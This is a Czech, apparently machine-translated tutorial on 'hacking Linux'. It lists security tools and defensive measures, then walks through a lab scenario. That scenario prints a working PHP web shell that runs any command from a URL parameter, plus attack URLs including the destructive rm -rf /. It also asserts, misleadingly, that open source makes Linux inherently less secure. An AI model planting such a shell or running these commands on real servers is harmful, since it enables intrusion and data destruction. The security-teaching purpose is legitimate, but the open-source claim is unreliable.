Hacking Linux OS: Hacking with Ubuntu (Výukový program příkazů)

Od: Oliver Jones Oliver Jones
Hours aktualizováno

Linux je nejrozšířenější serverový operační systém, zejména pro webové servery. Je to open source; to znamená, že kdokoli může mít přístup ke zdrojovému kódu. Díky tomu je méně bezpečný ve srovnání s jinými operačními systémy, protože útočníci mohou studovat zdrojový kód, aby našli zranitelnosti. Linux for Hackers je o zneužití těchto zranitelností k získání neoprávněného přístupu k systému.

V tomto článku vám představíme, co je Linux, jeho bezpečnostní zranitelnosti, hackování Ubuntu a protiopatření, která můžete zavést.

Rychlá poznámka k Linuxu

Linux je operační systém s otevřeným zdrojovým kódem. Existuje mnoho distribucí operačních systémů založených na Linuxu, jako je Redhat, Fedora a Ubuntuatd. Na rozdíl od jiných operačních systémů je Linux méně bezpečný, pokud jde o zabezpečení. Důvodem je to, že zdrojový kód je volně dostupný, takže je snadné v něm studovat zranitelnosti a zneužít je ve srovnání s jinými operačními systémy, které nejsou open source. Linux lze použít jako operační systém pro server, desktop, tablet nebo mobilní zařízení.

Linuxové programy lze ovládat pomocí GUI nebo příkazů. Linuxové příkazy pro Kali Linux hackování je ve srovnání s používáním GUI efektivnější a efektivnější. Z tohoto důvodu je užitečné znát základní linuxové příkazy pro hackování.

Podívejte se na tyto výukové programy https://www.guru99.com/unix-linux-tutorial.html o tom, jak začít Kali Linux hacky.

Linuxové hackerské nástroje

  • Nessus– tento nástroj lze použít pro Ubuntu hack, nastavení konfigurace skenování, záplaty a sítě atd. lze nalézt na https://www.tenable.com/products/nessus
  • Nmap. Tento nástroj lze použít ke sledování hostitelů běžících na serveru a služeb, které využívají. Lze jej také použít ke skenování portů. Lze jej nalézt na https://nmap.org/
  • SARA – SARA je zkratka pro Security Auditor's Research Assistant. Jak již z názvu vyplývá, tento nástroj lze použít k auditu sítí proti hrozbám, jako je např SQL Injection, XSS atd. lze nalézt na http://www-arc.com/sara/sara.html

Výše uvedený seznam není vyčerpávající; poskytuje vám představu o dostupných nástrojích Ubuntu hackování a hackování linuxových systémů.

Jak zabránit hackování Linuxu

Linux Hacking využívá zranitelnosti operačního systému. Organizace může přijmout následující zásady, aby se chránila proti takovým útokům.

  • Správa oprav– záplaty opravují chyby, které útočníci zneužívají ke kompromitaci systému. Dobrá politika správy záplat zajistí, že na váš systém budete neustále aplikovat příslušné záplaty.
  • Správná konfigurace OS– jiné exploity využívají slabiny v konfiguraci serveru. Neaktivní uživatelská jména a démoni by měli být zakázáni. Výchozí nastavení, jako jsou společná hesla k aplikaci, výchozí uživatelská jména a některá čísla portů, by měla být změněna.
  • Systém detekce narušení– takové nástroje lze použít ke zjištění neoprávněného přístupu do systému. Některé nástroje mají schopnost takové útoky detekovat a předcházet jim.

SOUVISEJÍCÍ ČLÁNKY

Hacking Activity: Hack a Ubuntu Linux systém využívající PHP

V tomto praktickém scénáři se naučíme, jak hackovat s Ubuntu a my vám poskytneme základní informace o tom, jak můžete používat PHP kompromitovat Linux. Nechystáme se cílit na žádnou oběť. Pokud si to chcete vyzkoušet, můžete si nainstalovat LAMPP na místní počítač.

PHP přichází se dvěma funkcemi, které lze použít k provádění hackerských příkazů Linuxu. Má funkce exec() a shell_exec(). Funkce exec() vrací poslední řádek výstupu příkazu, zatímco shell_exec() vrací celý výsledek příkazu jako řetězec.

Pro účely demonstrace předpokládejme, že manažeři útočníků nahráli následující soubor na webový server.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

TADY,

Výše uvedený skript získává příkaz z proměnné GET s názvem cmd. Příkaz se provede pomocí shell_exec() a výsledky se vrátí do prohlížeče.

Výše uvedený kód lze zneužít pomocí následující adresy URL

http://localhost/cp/konsole.php?cmd=ls%20-l

TADY,

  • “…konsole.php?cmd=ls%20-l”přiřadí proměnné cmd hodnotu ls –l.

Příkaz v Ubuntu pro hackování proti serveru bude provedeno jako

shell_exec('ls -l') ;

Spuštění výše uvedeného kódu na webovém serveru poskytuje výsledky podobné následujícím.

Hack a Ubuntu Linux systém využívající PHP

Výše uvedený příkaz jednoduše zobrazí soubory v aktuálním adresáři a oprávnění

Předpokládejme, že útočník předá následující příkaz

rm -rf /

TADY,

  • „rm“ odstraní soubory
  • „rf“ způsobí, že příkaz rm běží v rekurzivním režimu. Smazání všech složek a souborů
  • „/“ říká příkazu, aby začal mazat soubory z kořenového adresáře

Adresa URL útoku by vypadala nějak takto

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Shrnutí

  • Linux je oblíbený operační systém pro servery, stolní počítače, tablety a mobilní zařízení.
  • Linux je open source a zdrojový kód může získat kdokoli. Díky tomu je snadné odhalit zranitelnosti. Je to jeden z nejlepších OS pro hackery.
  • Základní a síťové hackerské příkazy v Ubuntu jsou cenné pro linuxové hackery.
  • Zranitelnosti jsou slabinou, kterou lze zneužít ke kompromitaci systému.
  • Dobré zabezpečení může pomoci chránit systém před napadením útočníkem.